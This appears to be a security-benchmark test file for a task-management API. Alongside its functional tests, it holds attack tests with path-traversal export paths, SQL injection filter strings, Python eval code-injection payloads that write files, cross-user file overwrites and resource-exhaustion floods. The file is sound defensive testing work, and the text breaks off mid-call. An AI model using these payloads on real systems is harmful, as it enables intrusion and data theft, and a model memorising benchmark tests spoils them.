# flake8: noqa
# isort: skip_file
import uuid

from exploits import load_file_from_docker

generate_marker = lambda: uuid.uuid4().hex
# import libraries
from typing import Any, Dict, List, Optional

import requests

import cwes

# always import AppInstance
from scenarios.base import AppInstance


# shared methods
def base_url(app: AppInstance) -> str:
    return f"http://localhost:{app.port}"


def is_2xx(status_code: int) -> bool:
    return 200 <= status_code < 300


def register_user(
    app: AppInstance, username: str, password: str
) -> Optional[requests.Response]:
    url = f"{base_url(app)}/users"
    resp = requests.post(url, json={"username": username, "password": password})
    if not is_2xx(resp.status_code):
        app.logger.warning(
            "Register user failed: %s %s, body=%s",
            resp.status_code,
            resp.reason,
            resp.text,
        )
        return None
    return resp


def obtain_token(app: AppInstance, username: str, password: str) -> Optional[str]:
    url = f"{base_url(app)}/auth/token"
    resp = requests.post(url, json={"username": username, "password": password})
    if not is_2xx(resp.status_code):
        app.logger.warning(
            "Obtain token failed: %s %s, body=%s",
            resp.status_code,
            resp.reason,
            resp.text,
        )
        return None
    data = resp.json()
    token = data.get("token")
    if not isinstance(token, str) or not token:
        app.logger.warning("Token missing or invalid in response: %s", data)
        return None
    return token


def auth_headers(token: str) -> Dict[str, str]:
    return {"Authorization": f"Bearer {token}"}


def create_task(
    app: AppInstance,
    token: str,
    title: str,
    due: str,
    done: Optional[bool] = None,
    tags: Optional[List[str]] = None,
) -> Optional[Dict[str, Any]]:
    url = f"{base_url(app)}/tasks"
    body: Dict[str, Any] = {"title": title, "due": due}
    if done is not None:
        body["done"] = done
    if tags is not None:
        body["tags"] = tags
    resp = requests.post(url, json=body, headers=auth_headers(token))
    if not is_2xx(resp.status_code):
        app.logger.warning(
            "Create task failed: %s %s, body=%s",
            resp.status_code,
            resp.reason,
            resp.text,
        )
        return None
    try:
        return resp.json()
    except Exception as e:
        app.logger.warning("Create task response not JSON: %s; error=%s", resp.text, e)
        return None


def query_tasks(
    app: AppInstance,
    token: str,
    filter_expr: str,
    sort_by: Optional[str] = None,
    order: Optional[str] = None,
    limit: Optional[int] = None,
    export_path: Optional[str] = None,
) -> Optional[Dict[str, Any]]:
    url = f"{base_url(app)}/tasks/query"
    body: Dict[str, Any] = {"filter": filter_expr}
    if sort_by is not None:
        body["sort_by"] = sort_by
    if order is not None:
        body["order"] = order
    if limit is not None:
        body["limit"] = limit
    if export_path is not None:
        body["export_path"] = export_path
    resp = requests.post(url, json=body, headers=auth_headers(token))
    if not is_2xx(resp.status_code):
        app.logger.warning(
            "Query tasks failed: %s %s, body=%s",
            resp.status_code,
            resp.reason,
            resp.text,
        )
        return None
    try:
        return resp.json()
    except Exception as e:
        app.logger.warning("Query response not JSON: %s; error=%s", resp.text, e)
        return None


def assert_task_fields(
    app: AppInstance,
    task: Dict[str, Any],
    expected: Dict[str, Any],
) -> bool:
    # Validate presence and values for a subset of fields
    for key, val in expected.items():
        if key not in task:
            app.logger.warning("Task missing expected key '%s': %s", key, task)
            return False
        if task[key] != val:
            app.logger.warning(
                "Task key '%s' mismatch. Expected %r, got %r", key, val, task[key]
            )
            return False
    # Validate id exists and is a string
    if "id" not in task or not isinstance(task["id"], str) or not task["id"]:
        app.logger.warning("Task id missing or invalid: %s", task)
        return False
    return True


# import other libraries
from typing import Optional, Set


# additional helper code not given already
def _safe_contains(content: bytes, needle: str) -> bool:
    try:
        return needle.encode() in content
    except Exception:
        return False


# import other libraries
import time
from typing import Optional, Set


# additional helper code not given already
def _find_marker_in_tasks(tasks, marker: str) -> bool:
    try:
        for t in tasks or []:
            title = t.get("title")
            if isinstance(title, str) and marker in title:
                return True
    except Exception:
        pass
    return False


# import other libraries
import time

# import other libraries
from typing import Set

# additional helper code not given already


# additional helper code not given already
def _redact_marker(s: str, marker: str) -> str:
    try:
        return s.replace(marker, "MARKER")
    except Exception:
        return s


def _exists_nonempty(content: bytes) -> bool:
    try:
        return isinstance(content, (bytes, bytearray)) and len(content) > 0
    except Exception:
        return False


import time

# import other libraries
import uuid
from typing import Optional, Set


# additional helper code not given already
def _read_file_with_retries(
    app, path: str, attempts: int = 5, delay: float = 0.2
) -> Optional[bytes]:
    last_exc = None
    for i in range(attempts):
        try:
            content = load_file_from_docker(app.container_id, path)
            return content
        except Exception as e:
            last_exc = e
            app.logger.debug(
                "Retry %d/%d reading file '%s' failed: %s", i + 1, attempts, path, e
            )
            time.sleep(delay)
    app.logger.warning(
        "Failed to read file after %d attempts: %s; last_err=%s",
        attempts,
        path,
        last_exc,
    )
    return None


import math

# import other libraries
import os
from typing import Any, Dict, List, Optional, Set


# additional helper code not given already
def _mb(n_bytes: int) -> float:
    try:
        return round(n_bytes / (1024 * 1024), 2)
    except Exception:
        return 0.0


# import other libraries
import base64
import hashlib
import hmac
import json
import time
from typing import Any, Dict, List, Optional, Set, Tuple


def func_test_end_to_end_query_with_filters_and_csv_export(app: AppInstance) -> bool:
    # 1) Register user
    if not register_user(app, "alice", "S3cureP@ssw0rd"):
        return False

    # 2) Authenticate
    token = obtain_token(app, "alice", "S3cureP@ssw0rd")
    if not token:
        return False

    # 3) Create tasks
    t1 = create_task(
        app, token, "Write report", "2025-01-15", done=False, tags=["work", "finance"]
    )
    if not t1:
        return False
    t2 = create_task(
        app,
        token,
        "Buy groceries",
        "2025-01-10",
        done=False,
        tags=["personal", "errands"],
    )
    if not t2:
        return False
    t3 = create_task(
        app, token, "Submit expense report", "2025-01-20", done=True, tags=["work"]
    )
    if not t3:
        return False

    # 4) Query with combined filters and CSV export
    export_path = f"{app.env.workdir}/alice_tasks.csv"
    filter_expr = 'title contains "report" AND due <= 2025-01-20 AND done = false AND tags contains "work"'
    result = query_tasks(app, token, filter_expr=filter_expr, export_path=export_path)
    if result is None:
        return False

    # Expected: exactly one matching task with specific fields
    tasks = result.get("tasks")
    count = result.get("count")
    if not isinstance(tasks, list) or count != 1 or len(tasks) != 1:
        app.logger.warning(
            "Unexpected tasks/count. tasks len=%s, count=%s, payload=%s",
            len(tasks) if isinstance(tasks, list) else None,
            count,
            result,
        )
        return False

    expected_task = {
        "title": "Write report",
        "due": "2025-01-15",
        "done": False,
        "tags": ["work", "finance"],
    }
    if not assert_task_fields(app, tasks[0], expected_task):
        return False

    # export_path should be present as a string when provided
    if (
        "export_path" not in result
        or not isinstance(result["export_path"], str)
        or not result["export_path"]
    ):
        app.logger.warning(
            "export_path missing or invalid in query response: %s", result
        )
        return False

    return True


def func_test_query_sort_by_title_desc_limit(app: AppInstance) -> bool:
    # 1) Register user
    if not register_user(app, "carol", "S3cureP@ssw0rd"):
        return False

    # 2) Authenticate
    token = obtain_token(app, "carol", "S3cureP@ssw0rd")
    if not token:
        return False

    # 3) Create tasks
    if not create_task(app, token, "Alpha", "2025-01-01", done=False, tags=[]):
        return False
    if not create_task(app, token, "Charlie", "2025-01-02", done=False, tags=[]):
        return False
    if not create_task(app, token, "Bravo", "2025-01-03", done=False, tags=[]):
        return False

    # 4) Query sorted by title desc, limit 2
    result = query_tasks(
        app,
        token,
        filter_expr="done = false",
        sort_by="title",
        order="desc",
        limit=2,
    )
    if result is None:
        return False

    tasks = result.get("tasks")
    count = result.get("count")
    if not isinstance(tasks, list) or len(tasks) != 2:
        app.logger.warning(
            "Unexpected tasks. tasks len=%s, payload=%s",
            len(tasks) if isinstance(tasks, list) else None,
            result,
        )
        return False
    if not isinstance(count, int) or count < len(tasks):
        app.logger.warning(
            "Invalid count. Expected int >= %d, got %r", len(tasks), count
        )
        return False

    titles = [t.get("title") for t in tasks]
    expected_titles = ["Charlie", "Bravo"]
    if titles != expected_titles:
        app.logger.warning(
            "Unexpected order. Expected %s, got %s", expected_titles, titles
        )
        return False

    # validate each task has required fields and id
    for task in tasks:
        if not isinstance(task, dict):
            app.logger.warning("Task is not an object: %s", task)
            return False
        # Only assert minimal fields that we set and id presence
        if (
            "title" not in task
            or "due" not in task
            or "done" not in task
            or "tags" not in task
        ):
            app.logger.warning("Task missing required fields: %s", task)
            return False
        if "id" not in task or not isinstance(task["id"], str) or not task["id"]:
            app.logger.warning("Task id missing/invalid: %s", task)
            return False

    # export_path should be absent when not requested
    if "export_path" in result:
        app.logger.warning(
            "export_path should be absent when not requested, got: %s",
            result.get("export_path"),
        )
        return False

    return True


def func_test_data_isolation_user_scope(app: AppInstance) -> bool:
    # 1) Register dave and create a task
    if not register_user(app, "dave", "S3cureP@ssw0rd"):
        return False
    token_dave = obtain_token(app, "dave", "S3cureP@ssw0rd")
    if not token_dave:
        return False
    if not create_task(
        app, token_dave, "Team meeting", "2025-02-01", done=False, tags=["work"]
    ):
        return False

    # 2) Register erin and create an identical task
    if not register_user(app, "erin", "S3cureP@ssw0rd"):
        return False
    token_erin = obtain_token(app, "erin", "S3cureP@ssw0rd")
    if not token_erin:
        return False
    if not create_task(
        app, token_erin, "Team meeting", "2025-02-01", done=False, tags=["work"]
    ):
        return False

    # 3) As dave, query tasks
    result = query_tasks(
        app, token_dave, filter_expr='title = "Team meeting" AND done = false'
    )
    if result is None:
        return False

    tasks = result.get("tasks")
    count = result.get("count")
    if not isinstance(tasks, list) or len(tasks) != 1 or count != 1:
        app.logger.warning(
            "Isolation failed or unexpected count. tasks len=%s, count=%s, payload=%s",
            len(tasks) if isinstance(tasks, list) else None,
            count,
            result,
        )
        return False

    expected_task = {
        "title": "Team meeting",
        "due": "2025-02-01",
        "done": False,
        "tags": ["work"],
    }
    if not assert_task_fields(app, tasks[0], expected_task):
        return False

    return True


def sec_test_path_traversal(app: AppInstance) -> set[cwes.CWE] | None:
    findings: Set[cwes.CWE] = set()

    try:
        marker = generate_marker()

        # Step 1: Register user (do not log the marker)
        username = f"u_{marker[:12]}"
        password = f"S3cureP@ss_{marker[:12]}"
        if register_user(app, username, password) is None:
            app.logger.warning("Path traversal test: user registration failed")
            return findings

        # Step 2: Obtain token
        token = obtain_token(app, username, password)
        if not token:
            app.logger.warning("Path traversal test: token acquisition failed")
            return findings

        # Step 3: Create a task that embeds the marker in the title
        created = create_task(
            app,
            token,
            title=f"poc {marker} task",
            due="2030-01-01",
            done=False,
            tags=["poc"],
        )
        if not created:
            app.logger.warning("Path traversal test: task creation failed")
            return findings

        # Prepare common query parameters
        filter_expr = f'title contains "{marker}"'
        sort_by = "due"
        order = "asc"
        limit = 10

        # Candidate export paths
        abs_path_target = f"/tmp/tasks_{marker}.csv"
        trav_path_target = f"/var/app/exports/../../tmp/tasks_{marker}_trav.csv"

        def attempt_export_and_check(export_path: str, check_path: str) -> bool:
            # Trigger export
            resp = query_tasks(
                app,
                token,
                filter_expr=filter_expr,
                sort_by=sort_by,
                order=order,
                limit=limit,
                export_path=export_path,
            )
            if resp is None:
                app.logger.info(
                    "Path traversal test: query/export attempt returned no JSON"
                )
                return False

            # Basic response sanity checks (avoid logging paths or marker)
            if "tasks" not in resp or "count" not in resp:
                app.logger.info("Path traversal test: unexpected query response shape")
                return False
            if resp.get("count", 0) < 1:
                app.logger.info(
                    "Path traversal test: query matched no tasks; cannot verify export"
                )
                return False

            # Try reading the file from the container at the expected location
            try:
                data = load_file_from_docker(app.container_id, check_path)
            except Exception as e:
                app.logger.info(
                    "Path traversal test: could not load exported file from container: %s",
                    e,
                )
                return False

            if not data:
                app.logger.info(
                    "Path traversal test: exported file empty or unreadable"
                )
                return False

            # Verify the marker is present in CSV content
            if _safe_contains(data, marker):
                return True

            app.logger.info(
                "Path traversal test: exported file does not contain expected marker content"
            )
            return False

        # Attempt 1: Absolute path outside typical export dir
        if attempt_export_and_check(abs_path_target, abs_path_target):
            findings.add(cwes.CWE.PATH_TRAVERSAL)
            return findings

        # Attempt 2: Directory traversal variant targeting /tmp
        if attempt_export_and_check(trav_path_target, f"/tmp/tasks_{marker}_trav.csv"):
            findings.add(cwes.CWE.PATH_TRAVERSAL)
            return findings

        # Optional Attempt 3: traversal leveraging app.env.workdir if available
        try:
            base = getattr(app.env, "workdir", None)
        except Exception:
            base = None
        if isinstance(base, str) and base:
            workdir_trav = f"{base.rstrip('/')}/exports/../../tmp/tasks_{marker}_wd.csv"
            if attempt_export_and_check(workdir_trav, f"/tmp/tasks_{marker}_wd.csv"):
                findings.add(cwes.CWE.PATH_TRAVERSAL)
                return findings

        # If none of the attempts succeeded, report no finding
        return findings

    except Exception as ex:
        app.logger.warning("Path traversal test: unexpected exception: %s", ex)
        return findings


def sec_test_sql_injection(app: AppInstance) -> set[cwes.CWE] | None:
    vulns: Set[cwes.CWE] = set()

    # 1) Setup users
    victim_user = f"victim_{uuid.uuid4().hex[:8]}"
    attacker_user = f"attacker_{uuid.uuid4().hex[:8]}"
    victim_pwd = f"V1ctim_{uuid.uuid4().hex[:10]}A!"
    attacker_pwd = f"Att4ck_{uuid.uuid4().hex[:10]}A!"

    app.logger.info("Registering victim and attacker users")
    if not register_user(app, victim_user, victim_pwd):
        app.logger.error("Failed to register victim user")
        return set()
    if not register_user(app, attacker_user, attacker_pwd):
        app.logger.error("Failed to register attacker user")
        return set()

    victim_token = obtain_token(app, victim_user, victim_pwd)
    if not victim_token:
        app.logger.error("Failed to obtain victim token")
        return set()

    attacker_token = obtain_token(app, attacker_user, attacker_pwd)
    if not attacker_token:
        app.logger.error("Failed to obtain attacker token")
        return set()

    # 2) Create victim tasks including a unique marker in the title
    marker = generate_marker()
    victim_title_marked = f"Quarterly Report {marker}"
    app.logger.info("Creating victim tasks")
    vt1 = create_task(
        app,
        victim_token,
        title=victim_title_marked,
        due="2025-01-31",
        done=False,
        tags=["victim"],
    )
    if not vt1 or not assert_task_fields(
        app, vt1, {"title": victim_title_marked, "due": "2025-01-31"}
    ):
        app.logger.error("Failed to create or validate victim task 1")
        return set()

    vt2 = create_task(
        app,
        victim_token,
        title="Victim Task 2",
        due="2025-02-01",
        done=False,
        tags=["victim"],
    )
    if not vt2 or not assert_task_fields(
        app, vt2, {"title": "Victim Task 2", "due": "2025-02-01"}
    ):
        app.logger.error("Failed to create or validate victim task 2")
        return set()

    # 3) Create attacker task (baseline)
    app.logger.info("Creating attacker task")
    at1 = create_task(
        app,
        attacker_token,
        title="Attacker Task",
        due="2025-03-01",
        done=False,
        tags=["attacker"],
    )
    if not at1 or not assert_task_fields(
        app, at1, {"title": "Attacker Task", "due": "2025-03-01"}
    ):
        app.logger.error("Failed to create or validate attacker task")
        return set()

    # Optional sanity check: attacker cannot see victim tasks with a benign filter
    app.logger.info("Running baseline benign query as attacker")
    benign_resp = query_tasks(
        app,
        attacker_token,
        filter_expr='title contains "Attacker Task"',
        sort_by="due",
        order="asc",
        limit=10,
    )
    if not benign_resp or not isinstance(benign_resp.get("tasks"), list):
        app.logger.warning(
            "Benign query failed or returned unexpected structure; continuing anyway"
        )
    else:
        if _find_marker_in_tasks(benign_resp.get("tasks"), marker):
            app.logger.warning(
                "Baseline query already reveals victim data; continuing to attempt injection anyway"
            )

    # 4) Attempt SQL injection via the filter language
    app.logger.info("Attempting SQL injection via filter expression")
    export_path = f"{app.env.workdir}/exfil_tasks.csv"

    # Primary payloads (ordered by likelihood of succeeding on naive concatenation)
    payloads = [
        'title contains "%\' OR 1=1 -- "',
        'title = "%\' OR 1=1 -- "',
        "title contains \"%' OR '1'='1' -- \"",
        "title = \"%' OR '1'='1' -- \"",
    ]

    injection_success = False
    observed_tasks: Optional[list] = None
    written_export_path: Optional[str] = None

    for idx, filter_expr in enumerate(payloads, start=1):
        app.logger.info("Trying payload %d/%d: %r", idx, len(payloads), filter_expr)
        inj_resp = query_tasks(
            app,
            attacker_token,
            filter_expr=filter_expr,
            sort_by="due",
            order="asc",
            limit=1000,
            export_path=export_path,
        )
        if not inj_resp:
            app.logger.warning(
                "Injected query returned no response; trying next payload"
            )
            continue

        tasks = inj_resp.get("tasks")
        count = inj_resp.get("count")
        if isinstance(tasks, list):
            app.logger.debug(
                "Injected query returned %d tasks (count=%r)", len(tasks), count
            )
        else:
            app.logger.warning(
                "Injected query returned unexpected tasks type: %r", type(tasks)
            )
            continue

        if _find_marker_in_tasks(tasks, marker):
            app.logger.info("Marker detected in injected query results")
            injection_success = True
            observed_tasks = tasks
            written_export_path = inj_resp.get("export_path")
            break
        else:
            app.logger.info("Marker not found with this payload; trying next")

    # 5) Verify impact via optional CSV export
    if injection_success and written_export_path:
        try:
            # Give a small delay in case the file writing is async
            time.sleep(0.2)
            app.logger.info(
                "Attempting to read exported CSV from %s", written_export_path
            )
            content = load_file_from_docker(app.container_id, written_export_path)
            if content and _safe_contains(content, marker):
                app.logger.info("Marker confirmed in exported CSV file")
            else:
                app.logger.warning(
                    "Marker not found in exported CSV (may still be a valid injection via API response)"
                )
        except Exception as e:
            app.logger.warning("Failed to read exported CSV: %s", e)

    # Final result
    if injection_success:
        app.logger.info(
            "SQL Injection confirmed via cross-tenant data disclosure in query response"
        )
        vulns.add(cwes.CWE.SQL_INJECTION)
    else:
        app.logger.info("SQL Injection not confirmed")

    return vulns


def sec_test_code_injection(app: AppInstance) -> set[cwes.CWE] | None:
    vulns: set[cwes.CWE] = set()
    try:
        # 1) Register and authenticate
        username = f"u_{uuid.uuid4().hex}"
        password = f"P@{uuid.uuid4().hex}A1!"
        if not register_user(app, username, password):
            app.logger.warning("Aborting: user registration failed")
            return vulns

        token = obtain_token(app, username, password)
        if not token:
            app.logger.warning("Aborting: obtain token failed")
            return vulns

        # 2) Create at least one task so the per-task eval runs
        if not create_task(
            app, token, title="seed", due="2025-01-31", done=False, tags=[]
        ):
            app.logger.warning("Aborting: failed to create initial task")
            return vulns

        # 3) Prepare a unique marker and target file path inside the server workdir
        marker = generate_marker()
        target_path = f"{app.env.workdir}/poc_{marker}"

        # 4) Build payloads that leverage the 'py:' eval backdoor
        payloads = [
            f"py:__import__('builtins').open('{target_path}','w').write('{marker}') or True",
            f'py:__import__("builtins").open("{target_path}","w").write("{marker}") or True',
            f"py:open('{target_path}','w').write('{marker}') or True",
            f'py:open("{target_path}","w").write("{marker}") or True',
        ]

        # 5) Execute queries with each variant and check for the side-effect
        for idx, fexpr in enumerate(payloads, start=1):
            app.logger.info("Attempting code-injection via py-prefix variant #%d", idx)
            resp = query_tasks(app, token, filter_expr=fexpr, limit=1)
            if resp is None:
                app.logger.warning(
                    "Variant #%d: query failed or returned non-JSON", idx
                )
                continue

            # Give backend a moment to perform the side-effect during eval
            time.sleep(0.2)

            try:
                data = load_file_from_docker(app.container_id, target_path)
                if data and marker.encode() in data:
                    app.logger.info(
                        "Code injection successful via py-prefix variant #%d (verified side-effect).",
                        idx,
                    )
                    vulns.add(cwes.CWE.CODE_INJECTION)
                    return vulns
            except Exception as e:
                app.logger.debug(
                    "Variant #%d: side-effect file not observed yet (%s).", idx, e
                )

        app.logger.info(
            "Code injection test completed: no successful side-effect observed."
        )
        return vulns
    except Exception as e:
        app.logger.warning("sec_test_code_injection encountered an error: %s", e)
        return vulns


def sec_test_improper_access_control(app: AppInstance) -> set[cwes.CWE] | None:
    findings: set[cwes.CWE] = set()
    app.logger.info(
        "Starting security test: Improper Access Control (CSV export arbitrary path). For educational use only."
    )

    # 1) Setup and registration/login
    marker = generate_marker()
    username = f"attacker_{marker[:10]}"
    password = "VeryS3cure!Pass"

    if not register_user(app, username, password):
        app.logger.warning("Aborting: user registration failed.")
        return findings

    token = obtain_token(app, username, password)
    if not token:
        app.logger.warning("Aborting: token acquisition failed.")
        return findings

    # 2) Create a task containing a unique marker
    title = f"Test export {marker}"
    due = "2025-01-31"
    task = create_task(app, token, title, due, done=False, tags=["poc", "export"])
    if not task:
        app.logger.warning("Aborting: failed to create task with marker.")
        return findings

    if not assert_task_fields(app, task, {"due": due}):
        app.logger.warning("Aborting: created task validation failed.")
        return findings

    # 3) Prepare filter and candidate export paths
    filter_expr = f'title contains "{marker}" AND done = false'

    candidate_paths = [
        f"/tmp/export-{marker}.csv",  # absolute path outside any per-user scope
        f"../tmp/export-{marker}-trv.csv",  # traversal attempt (if app joins under a base dir)
        f"/var/tmp/export-{marker}.csv",  # alternative absolute tmp
    ]
    workdir = getattr(getattr(app, "env", object()), "workdir", None)
    if isinstance(workdir, str) and workdir:
        candidate_paths.append(f"{workdir}/export-{marker}.csv")

    # 4) Determine expected allowed base/user directories
    import os

    if isinstance(workdir, str) and workdir:
        allowed_base_dir = os.path.abspath(os.path.join(workdir, "exports"))
    else:
        # Fallback common path used by this app
        allowed_base_dir = "/app/exports"
    allowed_user_dir = os.path.abspath(os.path.join(allowed_base_dir, username))

    def _is_within_dir(path: str, directory: str) -> bool:
        try:
            path_abs = os.path.abspath(path)
            dir_abs = os.path.abspath(directory)
            return path_abs == dir_abs or path_abs.startswith(dir_abs + os.sep)
        except Exception:
            return False

    # 5) Attempt exploitation with each candidate path
    for idx, export_path in enumerate(candidate_paths, start=1):
        redacted_path = _redact_marker(export_path, marker)
        app.logger.info(
            "Attempt %d: issuing CSV export to attacker-chosen path (redacted): %s",
            idx,
            redacted_path,
        )

        resp = query_tasks(
            app,
            token,
            filter_expr=filter_expr,
            sort_by="due",
            order="asc",
            limit=10,
            export_path=export_path,
        )
        if not resp:
            app.logger.warning("Attempt %d: query response missing or invalid.", idx)
            continue

        count = resp.get("count")
        tasks = resp.get("tasks")
        resp_export_path = resp.get("export_path")
        if count is None or tasks is None:
            app.logger.warning(
                "Attempt %d: query response missing 'count' or 'tasks'.", idx
            )
            continue
        if not isinstance(count, int) or count < 1:
            app.logger.warning(
                "Attempt %d: query returned no results (count=%s).", idx, count
            )
            continue
        if not _find_marker_in_tasks(tasks, marker):
            app.logger.warning(
                "Attempt %d: tasks returned do not include the marker-bearing task.",
                idx,
            )
            continue
        if not isinstance(resp_export_path, str) or not resp_export_path:
            app.logger.info(
                "Attempt %d: response lacks 'export_path' (export likely rejected).",
                idx,
            )
            continue

        # 6) Validate whether the file was written outside the allowed per-user directory
        resp_path_abs = os.path.abspath(resp_export_path)
        redacted_resp_path = _redact_marker(resp_path_abs, marker)
        app.logger.info(
            "Attempt %d: API indicates file was written to (redacted): %s",
            idx,
            redacted_resp_path,
        )

        if _is_within_dir(resp_path_abs, allowed_user_dir):
            # Constrained to allowed per-user area -> not a vuln per intended design
            app.logger.info(
                "Attempt %d: export constrained to per-user directory; not exploitable (redacted path=%s).",
                idx,
                redacted_resp_path,
            )
            continue

        # 7) Verify impact: unauthorized server-side file created outside allowed user dir
        content = _read_file_with_retries(app, resp_path_abs, attempts=5, delay=0.2)
        if content is None or not _exists_nonempty(content):
            app.logger.warning(
                "Attempt %d: exported file is missing or empty (redacted path=%s).",
                idx,
                redacted_resp_path,
            )
            continue

        if not _safe_contains(content, marker):
            app.logger.warning(
                "Attempt %d: exported file does not contain expected marker (redacted path=%s).",
                idx,
                redacted_resp_path,
            )
            continue

        app.logger.info(
            "Improper Access Control confirmed: arbitrary server-side CSV write outside allowed per-user scope (redacted path=%s).",
            redacted_resp_path,
        )
        findings.add(cwes.CWE.IMPROPER_ACCESS_CONTROL)
        return findings

    app.logger.info(
        "No evidence of improper access control via CSV export path. Test concluded."
    )
    return findings


def sec_test_incorrect_authorization(app: AppInstance) -> set[cwes.CWE] | None:
    findings: Set[cwes.CWE] = set()
    try:
        # Unique suffix for isolation between test runs
        suffix = uuid.uuid4().hex[:8]
        victim_username = f"victim_{suffix}"
        attacker_username = f"attacker_{suffix}"
        victim_password = "VictimPass123!"
        attacker_password = "AttackerPass123!"
        export_path = f"/tmp/victim_tasks_{suffix}.csv"

        app.logger.info(
            "Starting CWE-863 PoC with users: %s, %s; export_path=%s",
            victim_username,
            attacker_username,
            export_path,
        )

        # 1) Register users
        if not register_user(app, victim_username, victim_password):
            app.logger.error("Could not register victim user")
            return findings
        if not register_user(app, attacker_username, attacker_password):
            app.logger.error("Could not register attacker user")
            return findings

        # 2) Obtain tokens
        victim_token = obtain_token(app, victim_username, victim_password)
        attacker_token = obtain_token(app, attacker_username, attacker_password)
        if not victim_token or not attacker_token:
            app.logger.error(
                "Token acquisition failed (victim_token or attacker_token missing)"
            )
            return findings

        # 3) Seed tasks for each user
        victim_task = create_task(
            app,
            victim_token,
            title="victim baseline",
            due="2025-01-31",
            done=False,
            tags=["work"],
        )
        if victim_task is None:
            app.logger.error("Failed to create victim task")
            return findings

        marker = generate_marker()
        attacker_title = f"marker-{marker}"
        attacker_task = create_task(
            app,
            attacker_token,
            title=attacker_title,
            due="2025-01-31",
            done=False,
            tags=["poc"],
        )
        if attacker_task is None:
            app.logger.error("Failed to create attacker task")
            return findings

        app.logger.info("Tasks created for victim and attacker")

        # 4) Victim performs a legitimate export to establish the file
        victim_filter = 'title contains "victim"'
        victim_query_resp = query_tasks(
            app,
            victim_token,
            filter_expr=victim_filter,
            sort_by="due",
            order="asc",
            limit=100,
            export_path=export_path,
        )
        if not victim_query_resp:
            app.logger.error("Victim export failed (no response JSON)")
            return findings
        if victim_query_resp.get("export_path") != export_path:
            app.logger.warning(
                "Victim response export_path mismatch: expected %s got %s",
                export_path,
                victim_query_resp.get("export_path"),
            )

        # Read file to confirm it exists and initially does not contain the marker
        content_before = _read_file_with_retries(
            app, export_path, attempts=6, delay=0.25
        )
        if content_before is None or not _exists_nonempty(content_before):
            app.logger.error("Victim CSV file not created or empty at %s", export_path)
            return findings
        if _safe_contains(content_before, marker):
            app.logger.warning(
                "Victim CSV unexpectedly already contains marker (pre-overwrite). This reduces confidence in cross-user overwrite validation."
            )

        app.logger.info(
            "Victim CSV established at %s (size=%d bytes)",
            export_path,
            len(content_before),
        )

        # 5) Attacker overwrites victim's CSV by exporting to the same path
        attacker_filter = 'title contains "marker-"'
        attacker_query_resp = query_tasks(
            app,
            attacker_token,
            filter_expr=attacker_filter,
            sort_by="due",
            order="asc",
            limit=100,
            export_path=export_path,
        )
        if not attacker_query_resp:
            app.logger.error("Attacker export failed (no response JSON)")
            return findings
        if attacker_query_resp.get("export_path") != export_path:
            app.logger.warning(
                "Attacker response export_path mismatch: expected %s got %s",
                export_path,
                attacker_query_resp.get("export_path"),
            )
        app.logger.info("Attacker export acknowledged by API for path %s", export_path)

        # 6) Verify overwrite by checking marker in file after attacker export
        content_after = _read_file_with_retries(
            app, export_path, attempts=8, delay=0.25
        )
        if content_after is None or not _exists_nonempty(content_after):
            app.logger.error("Failed to read CSV after attacker export or file empty")
            return findings

        contains_marker = _safe_contains(content_after, marker)
        if contains_marker:
            # Success: file now contains attacker's marker, demonstrating cross-user unauthorized overwrite
            app.logger.info(
                "CSV at %s now contains attacker marker; cross-tenant overwrite confirmed.",
                export_path,
            )
            findings.add(cwes.CWE.INCORRECT_AUTHORIZATION)
        else:
            app.logger.warning(
                "CSV at %s does not contain attacker marker after overwrite attempt.",
                export_path,
            )

        return findings
    except Exception as e:
        app.logger.exception("Unexpected error during CWE-863 PoC: %s", e)
        return findings


def sec_test_uncontrolled_resource_consumption(
    app: AppInstance,
) -> set[cwes.CWE] | None:
    findings: set[cwes.CWE] = set()

    # Tunables chosen to be effective but not excessively slow
    TITLE_SIZE = 64 * 1024  # 64 KiB
    TAG_ELEM_SIZE = 8 * 1024  # 8 KiB
    NUM_TAGS = 8  # 1 small "marker" tag + 7 large tags
    N_TASKS = 120  # rows per CSV export (<= 1000 per spec)
    M_EXPORTS = 6  # number of repeated exports
    MIN_TOTAL_BYTES = 64 * 1024 * 1024  # 64 MiB total exported CSV to qualify
    MIN_SINGLE_BYTES = 8 * 1024 * 1024  # 8 MiB for at least one CSV

    marker = generate_marker()
    redacted = lambda s: _redact_marker(s, marker)

    try:
        # 1) Register and authenticate
        username = f"user_{marker[:12]}"
        password = f"P@ss-{marker[:8]}-xYz"  # >= 8 chars

        app.logger.info("Registering user for resource consumption test")
        if not register_user(app, username, password):
            app.logger.warning("Aborting: could not register test user")
            return set()

        token = obtain_token(app, username, password)
        if not token:
            app.logger.warning("Aborting: could not obtain token")
            return set()

        # 2) Seed heavy data
        app.logger.info(
            "Creating %d heavy tasks (title=%d bytes, tags=%d x %d bytes)",
            N_TASKS,
            TITLE_SIZE,
            NUM_TAGS,
            TAG_ELEM_SIZE,
        )

        title_padding = max(1, TITLE_SIZE - len(marker) - 1)
        big_title = f"{marker} " + ("A" * title_padding)

        # tags: include one exact MARKER for precise filter; the rest are large fillers
        large_tag = "B" * TAG_ELEM_SIZE
        tags_template: List[str] = [marker] + [large_tag for _ in range(NUM_TAGS - 1)]

        created = 0
        for i in range(N_TASKS):
            due = "2030-12-31"
            task = create_task(
                app=app,
                token=token,
                title=big_title,
                due=due,
                done=False,
                tags=tags_template,
            )
            if task:
                created += 1
                if created % 20 == 0:
                    app.logger.info("Created %d/%d heavy tasks", created, N_TASKS)
            else:
                app.logger.warning("Failed to create task %d/%d", i + 1, N_TASKS)

        if created < max(50, int(0.6 * N_TASKS)):
            app.logger.warning(
                "Insufficient heavy tasks created: %d/%d; aborting", created, N_TASKS
            )
            return set()

        # 3) Export queries to server-side CSV repeatedly
        filter_expr = (
            f'title contains "{marker}" AND done = false AND tags contains "{marker}"'
        )
        limit = min(1000, created)

        app.logger.info(
            "Starting repeated CSV exports: exports=%d, limit=%d, filter=%s",
            M_EXPORTS,
            limit,
            redacted(filter_expr),
        )

        total_bytes = 0
        largest_file = 0
        export_paths: List[str] = []

        for j in range(1, M_EXPORTS + 1):
            export_path = f"{app.env.workdir}/exports_{marker}_{j:04d}.csv"
            export_paths.append(export_path)
            resp = query_tasks(
                app=app,
                token=token,
                filter_expr=filter_expr,
                sort_by="title",
                order="asc",
                limit=limit,
                export_path=export_path,
            )
            if not resp:
                app.logger.warning("Export %d failed: no response", j)
                continue

            # Expect count ~= created, and export_path present
            resp_count = resp.get("count")
            resp_export_path = resp.get("export_path")
            if not isinstance(resp_export_path, str):
                app.logger.warning(
                    "Export %d did not return export_path; response keys: %s",
                    j,
                    list(resp.keys()),
                )
                continue

            app.logger.info(
